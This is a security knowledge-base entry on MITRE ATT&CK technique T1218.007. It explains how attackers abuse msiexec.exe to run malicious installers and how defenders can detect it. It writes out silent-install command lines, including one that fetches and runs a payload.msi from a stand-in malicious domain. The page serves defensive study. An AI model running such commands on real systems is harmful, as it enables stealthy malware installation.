Msiexec

Information

• Name: Msiexec

• ID: T1218.007

• Tactics: TA0005

• Technique: T1218

Introduction

Msiexec (T1218.007) is a sub-technique under the MITRE ATT&CK framework's Signed Binary Proxy Execution (T1218) technique. Attackers leverage the legitimate Windows Installer executable "msiexec.exe" to execute malicious payloads, bypass application control measures, and evade detection. Because msiexec.exe is a trusted and digitally signed Windows binary, adversaries exploit this trust to mask their malicious activities.

Deep Dive Into Technique

The Msiexec utility is a built-in Windows application responsible for installing, modifying, and uninstalling Windows Installer packages (.msi files). Attackers abuse this legitimate functionality to execute malicious code by embedding payloads within installer packages or by passing specially crafted command-line arguments.

Technical details of execution methods:

• Direct Execution of Malicious MSI Files:

  • Attackers craft malicious MSI installer packages containing embedded payloads or scripts.

  • Execute using command-line:

    Copy

    msiexec.exe /i malicious.msi /quiet

  • The /quiet flag suppresses user interaction, allowing stealthy execution.

• Remote Execution via URLs:

  • Msiexec can download and execute MSI files directly from remote locations:

    Copy

    msiexec.exe /i http://malicious.domain/payload.msi /quiet

  • This method eliminates the need to store payloads locally, reducing forensic artifacts.

• Embedding Scripts and Commands:

  • Attackers can embed custom scripts (VBScript, JScript) within MSI files.

  • Upon installation, these scripts execute malicious commands or download secondary payloads.

• DLL Side-loading via MSI:

  • Attackers leverage MSI installers to perform DLL side-loading attacks, loading malicious DLLs via trusted binaries.

Real-world procedures often involve:

• Social engineering to trick users into executing malicious MSI files.

• Phishing campaigns distributing malicious MSI attachments or URLs.

• Exploitation of compromised supply chains to distribute malicious MSI installers.

When this Technique is Usually Used

Attackers typically employ Msiexec (T1218.007) during various stages of the attack lifecycle:

• Initial Access:

  • Phishing emails containing malicious MSI attachments or links.

  • Malicious software downloads from compromised websites or software repositories.

• Execution:

  • Direct execution of malicious MSI files to run payloads on target systems.

  • Remote MSI execution to avoid local file detection and analysis.

• Defense Evasion:

  • Leveraging trusted binaries and legitimate installer processes to bypass security controls, application whitelisting, and endpoint detection solutions.

• Persistence:

  • Installing malicious software or scripts that establish persistent footholds through MSI packages.

• Privilege Escalation:

  • Abuse of MSI installers that run with elevated privileges to escalate attacker privileges.

How this Technique is Usually Detected

Detection methods and tools commonly used to identify Msiexec abuse include:

• Command-line Monitoring:

  • Monitoring execution of msiexec.exe with suspicious flags or remote URLs.

  • Example suspicious command:

    Copy

    msiexec.exe /i http://malicious.domain/payload.msi /quiet

• Endpoint Detection and Response (EDR):

  • EDR solutions monitor and analyze process executions, command-line arguments, and behaviors of msiexec.exe.

  • Detecting anomalous parent-child process relationships involving msiexec.exe.

• Network Traffic Analysis:

  • Monitoring network traffic for unusual MSI file downloads from external or unknown domains.

  • Detecting unusual HTTP requests initiated by msiexec.exe.

• File Integrity Monitoring (FIM):

  • Monitoring MSI files created or modified in unusual directories or at unexpected times.

• Behavioral Analytics and SIEM Correlation:

  • SIEM tools correlate events involving msiexec.exe executions with other suspicious activities and indicators.

Common Indicators of Compromise (IoCs):

• Suspicious MSI file hashes identified by threat intelligence feeds.

• Unfamiliar or unsigned MSI installer files.

• Network connections initiated by msiexec.exe to untrusted or malicious domains.

• Unusual msiexec.exe executions outside normal software installation periods or processes.

Why it is Important to Detect This Technique

Early detection of Msiexec abuse is crucial due to the potential severity of impacts:

• Initial Compromise and Malware Installation:

  • Attackers can quickly establish footholds, leading to advanced persistent threats (APTs), ransomware infections, or data exfiltration.

• Bypassing Security Controls:

  • Msiexec is a trusted Windows binary, allowing attackers to bypass application whitelisting, endpoint protection, and antivirus solutions, facilitating stealthy and persistent attacks.

• Privilege Escalation and Lateral Movement:

  • Misuse of MSI installers may lead to privilege escalation, enabling attackers to gain administrative control and propagate deeper into networks.

• Data Breach and Exfiltration:

  • Attackers leveraging this technique can deploy tools that exfiltrate sensitive data, leading to significant financial and reputational damage.

• Operational Disruption:

  • Malicious MSI installers can deploy ransomware or destructive malware, causing severe operational disruptions and downtime.

Proactive detection minimizes the attacker's dwell time, reduces potential damage, and enhances an organization's overall security posture.

Examples

Real-world examples and attack scenarios illustrating Msiexec abuse:

• APT Groups (Advanced Persistent Threats):

  • Several nation-state threat actors have leveraged malicious MSI installers in targeted espionage campaigns. For example, APT29 (Cozy Bear) has used MSI files containing malicious payloads in spear-phishing campaigns to gain initial access and persistence.

• FIN7 Cybercrime Group:

  • FIN7 has distributed malicious MSI files via spear-phishing emails masquerading as legitimate software updates or invoices. Upon execution, these MSI files deploy malware such as Carbanak for financial fraud and data theft.

• Ransomware Campaigns:

  • Ransomware operators distribute malicious MSI files via phishing emails or compromised websites. MSI installers silently deploy ransomware payloads, encrypting victim data and demanding ransom payments.

• Supply Chain Attacks:

  • Attackers compromise legitimate software distribution channels, embedding malicious MSI installers within legitimate software updates. Users unknowingly execute these malicious MSI files, providing attackers widespread access.

Tools commonly associated with this technique:

• Advanced Installer, WiX Toolset, Orca:

  • Legitimate, freely available tools attackers abuse to craft malicious MSI installers.

• Metasploit Framework:

  • Attackers use Metasploit to generate malicious MSI payloads for penetration testing or malicious attacks.

Impacts observed in real-world scenarios:

• Financial losses due to data breaches and ransomware infections.

• Compromise of sensitive intellectual property and confidential data.

• Reputational damage resulting from publicized security incidents.

• Operational disruptions and downtime due to malware infections and remediation efforts.